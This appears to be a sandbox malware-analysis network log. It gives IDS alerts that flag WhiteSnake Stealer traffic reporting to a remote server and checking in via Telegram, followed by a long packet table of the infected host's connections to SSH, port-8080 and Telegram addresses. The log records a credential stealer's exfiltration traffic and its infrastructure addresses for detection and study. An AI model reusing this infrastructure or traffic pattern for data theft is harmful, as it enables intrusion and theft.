2024-09-27T23:28:00.420730+0200 | 2045868 | ET MALWARE [ANY.RUN] WhiteSnake Stealer Reporting Request (Outbound) | 1 | 192.168.2.5 | 49739 | 188.120.242.78 | 8817 | TCP
2024-09-27T23:28:02.050959+0200 | 2045869 | ET MALWARE WhiteSnake Stealer Telegram Checkin | 1 | 192.168.2.5 | 49740 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                Sep 27, 2024 23:27:14.995824099 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.000602961 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.002367020 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.005770922 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.018399954 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.018476009 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.018544912 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.067748070 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.067807913 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.075817108 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.078074932 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.082911015 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.115700960 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.115791082 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.167802095 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.167890072 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.219722986 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.219814062 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.271747112 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.271820068 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.289422035 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.306586981 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.311395884 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.311484098 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.316302061 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.319744110 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.319811106 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.367712975 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.367775917 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.409276962 CEST8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.415777922 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.415863037 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.463754892 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.463828087 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.471215963 CEST4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                Sep 27, 2024 23:27:15.511887074 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.511953115 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.541259050 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.542687893 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.548568964 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.549449921 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.559844017 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.559966087 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.611355066 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.611835003 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.611835003 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.611906052 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.617079020 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.635660887 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.638587952 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.643381119 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.828524113 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.895647049 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.895737886 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.895751953 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.895854950 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.896092892 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.896651983 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.896775007 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.897093058 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.899945974 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.901622057 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.901705980 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.902585983 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.902834892 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.904722929 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.904840946 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:15.909820080 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.951845884 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.951945066 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:15.999723911 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:15.999845982 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.047700882 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.047790051 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.076065063 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.076395035 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:16.084177971 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.084249020 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:16.091078043 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.095691919 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.095781088 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.143708944 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.143774986 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.191721916 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.191797972 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.201417923 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.201808929 CEST4971022192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:16.206547976 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.243717909 CEST808049708185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.243810892 CEST497088080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.252697945 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257612944 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257651091 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257654905 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257663012 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257668018 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257671118 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257714033 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257756948 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257761002 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257765055 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257770061 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257774115 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.257863045 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:16.262572050 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.262634993 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:16.262639046 CEST808049711185.253.7.60192.168.2.5
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 27, 2024 23:27:16.262651920 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.262655020 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.262687922 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.262720108 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.262783051 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.291747093 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.291819096 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.303705931 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.303924084 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.343725920 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.343791962 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.351708889 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.351772070 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.380263090 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.380664110 CEST  49710        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.381526947 CEST  22           49707      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.381912947 CEST  49707        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.385468960 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.386694908 CEST  22           49707      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.391685009 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.391753912 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.399736881 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.399813890 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.439716101 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.440037012 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.447700977 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.447807074 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.487716913 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.487792969 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.495702028 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.495763063 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.535716057 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.535778046 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.543724060 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.543787003 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.559175968 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.559372902 CEST  49710        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.560796022 CEST  22           49707      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.564157963 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.564321995 CEST  49710        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.569086075 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.576445103 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:16.576484919 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:16.576555967 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:16.583735943 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.583803892 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.587234020 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:16.587248087 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:16.591764927 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.591908932 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.611661911 CEST  49707        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.631776094 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.631843090 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.639733076 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.639807940 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.679730892 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.679806948 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.687706947 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.687791109 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.690418005 CEST  22           49707      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.727762938 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.727849007 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.735754967 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.735819101 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.736685038 CEST  49707        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.775748014 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.775958061 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.783721924 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.783790112 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.823717117 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.823797941 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.831675053 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.831747055 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.866707087 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.870589972 CEST  49710        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:16.871721029 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.871814013 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.875632048 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:16.880021095 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.880084991 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.919739008 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.920298100 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.927717924 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.927779913 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.967696905 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.967781067 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:16.975719929 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:16.975804090 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.015727043 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.015911102 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.023706913 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.023762941 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.049316883 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:17.063750029 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.063831091 CEST  49708        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.071702957 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.072211981 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.096045017 CEST  49710        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:17.115708113 CEST  8080         49708      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.119709969 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.119784117 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.171720982 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.173273087 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.178457975 CEST  22           49710      138.68.79.95     192.168.2.5
Sep 27, 2024 23:27:17.190313101 CEST  49713        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.190345049 CEST  443          49713      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.190427065 CEST  49713        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.197525978 CEST  49713        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.197541952 CEST  443          49713      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.213839054 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.213915110 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.219038010 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.219048023 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.219255924 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.219783068 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.219839096 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.236660957 CEST  49710        22         192.168.2.5      138.68.79.95
Sep 27, 2024 23:27:17.267919064 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.270001888 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.270054102 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.287183046 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.315716028 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.315772057 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.327410936 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.363734007 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.363807917 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.411792040 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.411855936 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.459702015 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.459779024 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.507709980 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.507946968 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.555728912 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.558248043 CEST  49711        8080       192.168.2.5      185.253.7.60
Sep 27, 2024 23:27:17.605725050 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.605792999 CEST  443          49712      149.154.167.220  192.168.2.5
Sep 27, 2024 23:27:17.605947971 CEST  49712        443        192.168.2.5      149.154.167.220
Sep 27, 2024 23:27:17.607698917 CEST  8080         49711      185.253.7.60     192.168.2.5
Sep 27, 2024 23:27:17.607817888 CEST  49711        8080       192.168.2.5      185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.610836983 CEST49712443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:17.655695915 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.655765057 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.703797102 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.703936100 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.751745939 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.751842976 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.769745111 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.800102949 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.800235033 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.830065012 CEST44349713149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.830200911 CEST49713443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:17.830246925 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:17.847721100 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.847811937 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.850266933 CEST49713443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:17.850282907 CEST44349713149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.850599051 CEST44349713149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.856045008 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.861943007 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:17.866978884 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.892923117 CEST49713443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:17.895750999 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.895844936 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.934946060 CEST49713443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:17.947704077 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.947808027 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:17.975445032 CEST44349713149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.995749950 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:17.995887041 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.041599989 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.043739080 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.043819904 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.051212072 CEST4970722192.168.2.5138.68.79.95
                                                                                                                                                                                                Sep 27, 2024 23:27:18.264664888 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.264818907 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.265280008 CEST44349713149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.265332937 CEST2249707138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.265443087 CEST44349713149.154.167.220192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.265512943 CEST49713443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:18.266067028 CEST49713443192.168.2.5149.154.167.220
                                                                                                                                                                                                Sep 27, 2024 23:27:18.269659996 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.269747019 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.315732956 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.315836906 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.363729000 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.363828897 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.411752939 CEST808049711185.253.7.60192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.411840916 CEST497118080192.168.2.5185.253.7.60
                                                                                                                                                                                                Sep 27, 2024 23:27:18.418184996 CEST2249710138.68.79.95192.168.2.5
                                                                                                                                                                                                Sep 27, 2024 23:27:18.437361002 CEST4971022192.168.2.5138.68.79.95
